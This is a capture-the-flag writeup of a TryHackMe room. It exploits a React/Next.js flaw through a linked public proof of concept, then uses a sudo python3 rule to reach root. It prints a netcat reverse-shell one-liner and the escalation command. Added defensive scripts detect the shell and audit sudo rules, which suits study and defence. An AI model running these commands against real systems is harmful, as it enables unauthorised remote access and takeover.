# TryHackMe Corp Website—Writeup

Welcome back to another writeup. This time, I’ll be going through how I solved the **Corp Website!** challenge from the THM Valentine’s event, **Love at First Breach 2026**. No excitement, no rush, just steps, logic, and silence. While the theme talks about love, this challenge felt more like tracing what was left behind: small mistakes, exposed surfaces, and things that were never meant to be seen. I’ll document the process from initial reconnaissance to the final compromise, focusing less on celebration and more on understanding how it all fell apart.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FXkqJzheX1ZwRj1f1y5By%2Fanimesher.com_sad-anime-girl-sad-gif-1997847.gif?alt=media&#x26;token=503c0b23-7bd0-4d8c-b2a7-17bb6ccd06ba" alt=""><figcaption></figcaption></figure>

Let's visit the site.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FcmCm8dhSBGIX5rsYZh5q%2FScreenshot%20(1279).png?alt=media&#x26;token=7e660cf9-a8c0-4ae3-828d-2f66c062ac86" alt=""><figcaption></figcaption></figure>

Huh, a sleek Valentine’s website. What’s the point? Places like this… ones full of feelings… have no space for someone as numb and broken as me.

As I dug into the site’s structure, I noticed `_next/` paths and React lazy-loaded components in the source. Looks like this app was built with **React** and **Node.js**.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FmHMhOAGi17ncowyWHmid%2FScreenshot%20(1277).png?alt=media&#x26;token=41efb2f8-f467-4577-9cc3-42dca7276de2" alt=""><figcaption></figcaption></figure>

At first, I thought this challenge might be vulnerable to **React2Shell**. If you remember, last year that vulnerability caused source code leaks and DoS issues—and it looks like this challenge is affected by the same flaw.

The next thing I did was look for an exploit for this on GitHub, and I found this [PoC](https://github.com/liamromanis101/cve-2025-55182).

So the next thing I did was set up a reverse shell. This is the payload I used:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.243 1234 >/tmp/f
```
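From the defender's side, this payload leaves a recognizable process trail: the web runtime spawns a shell, and an interactive shell is wired to a FIFO and netcat. The following is an added example, not part of the original writeup; the event records, process names and the `192.0.2.10` address are constructed assumptions.

```python
import re

# Constructed process-creation events: (parent process name, child command line).
# 192.0.2.10 is a documentation address, not a value from the writeup.
SAMPLE_EVENTS = [
    ("node", "/bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.0.2.10 1234 >/tmp/f"),
    ("node", "/usr/bin/node /app/server.js"),
    ("sshd", "/bin/bash -l"),
    ("node", "/bin/sh -c id"),
    ("cron", "/bin/sh -c mkfifo /var/run/backup.pipe"),
]

WEB_RUNTIMES = {"node", "next-server"}  # assumed names of the web app's processes
SHELLS = {"sh", "bash", "dash", "zsh"}

FIFO = re.compile(r"\bmkfifo\s+([^\s;|&]+)")
INTERACTIVE_SHELL = re.compile(r"\b(?:sh|bash|dash|zsh)\s+-i\b")
NETCAT = re.compile(r"\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b")

def reasons_for(parent, cmdline):
    """Return the reasons one process event resembles the FIFO reverse shell."""
    reasons = []
    argv0 = cmdline.split()[0].rsplit("/", 1)[-1]
    if parent in WEB_RUNTIMES and argv0 in SHELLS:
        reasons.append("web runtime spawned a shell")
    fifo = FIFO.search(cmdline)
    # A FIFO alone is normal (see the cron event); require it to be reused
    # in the same command line together with an interactive shell.
    if fifo and cmdline.count(fifo.group(1)) >= 2 and INTERACTIVE_SHELL.search(cmdline):
        reasons.append("interactive shell wired to a FIFO")
    if NETCAT.search(cmdline):
        reasons.append("netcat connection to host and port")
    return reasons

def triage(events):
    """Map event index -> reasons, for events with at least one reason."""
    flagged = {}
    for i, (parent, cmdline) in enumerate(events):
        reasons = reasons_for(parent, cmdline)
        if reasons:
            flagged[i] = reasons
    return flagged

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][1][:40], "->", "; ".join(why))
```

A single reason such as `node` running `sh -c id` is worth reviewing; all three together match the payload shown above.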

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Flladw9XJrt53LMv34jg5%2FScreenshot%20(1291).png?alt=media&#x26;token=fc8f6295-2dd6-4ce2-986d-fc6dfde08da3" alt=""><figcaption></figcaption></figure>

And voila!

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FMEXA3oTl4VtRXEhjvW8o%2FScreenshot%20(1292).png?alt=media&#x26;token=17fc17dd-0294-4aba-a702-6d2fa332a946" alt=""><figcaption></figcaption></figure>

We have a shell!

Now let's get the user flag:

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FE4XyFSO5NwCJvwe0OaAv%2FScreenshot%20(1295).png?alt=media&#x26;token=aa94b8ca-fa83-4f6b-ad42-e0ebc81499be" alt=""><figcaption></figcaption></figure>

Now the question is how to reach root. The next thing I did was list the commands available with elevated privileges by running `sudo -l`.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FhQJgGg76TKbPIahstYfI%2FScreenshot%20(1296).png?alt=media&#x26;token=1af80399-a9b4-4f4e-aea4-45d7602c35d1" alt=""><figcaption></figcaption></figure>

Python3... That means we can have Python spawn a new shell through `sudo` and escalate our privileges to root.

```
sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
```
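The misconfiguration behind this step is a sudoers rule that grants a general-purpose interpreter. As an added example (not from the original writeup), this audit parses `sudo -l` output and flags such rules; the sample listing, user name and host name are constructed, and the `CODE_RUNNERS` set is an illustrative, non-exhaustive assumption.

```python
import re
from pathlib import PurePosixPath

# Constructed `sudo -l` output; user, host and script names are placeholders.
SAMPLE_SUDO_L = """\
User webapp may run the following commands on corp-web:
    (root) NOPASSWD: /usr/bin/python3
    (root) /usr/bin/systemctl restart corp-site.service
    (ALL : ALL) NOPASSWD: /usr/bin/find, /usr/bin/python3 /opt/scripts/report.py
"""

# Programs that run arbitrary code or commands by design (not exhaustive).
CODE_RUNNERS = {"python", "python3", "perl", "ruby", "node", "sh", "bash",
                "find", "vim", "awk", "env"}

# Matches entry lines such as "    (root) NOPASSWD: /usr/bin/python3".
ENTRY = re.compile(r"^\s+\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_listing(text):
    """Return findings for sudo rules that hand out code execution."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header lines and blanks
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Simplification: commas escaped inside arguments are not handled.
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            argv = cmd.split()
            name = PurePosixPath(argv[0]).name
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif name in CODE_RUNNERS and len(argv) == 1:
                # A sudoers command with no arguments listed accepts any arguments.
                reason = "code runner with caller-controlled arguments"
            elif name in CODE_RUNNERS:
                reason = "code runner with fixed arguments; verify the target is not user-writable"
            else:
                continue
            findings.append({"runas": m.group("runas"), "command": cmd,
                             "nopasswd": nopasswd, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE_SUDO_L):
        print(f)
```

Rules flagged as "caller-controlled arguments" are the ones to replace with a narrowly scoped command or a root-owned wrapper script.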

And...

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FYDXvxIyWS1awCzJW70a1%2FScreenshot%20(1298).png?alt=media&#x26;token=b9dd50d2-264e-4026-8dd9-8a98e1d5c38f" alt=""><figcaption></figcaption></figure>

We've got root, and here's the root flag (redacted, of course).

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FBv4ret2P8ltEn15jpgp9%2FScreenshot%20(1300).png?alt=media&#x26;token=3f9a067c-1e60-44d1-ac24-02ae8dedb45d" alt=""><figcaption></figcaption></figure>

And that’s where it ends. No fireworks, no celebration, just a root shell staring back at me. The challenge is solved, but nothing really changes. This writeup isn’t about winning or proving anything; it’s just a record of steps, mistakes, and quiet persistence. In a challenge wrapped in Valentine’s colors and soft words, the reality underneath was still the same: systems fail, trust breaks, and everything leaves a trace. Sometimes you don’t break in with force, you just follow what was already exposed. Close the terminal, take a breath, and move on. There’s always another machine waiting to fall apart.
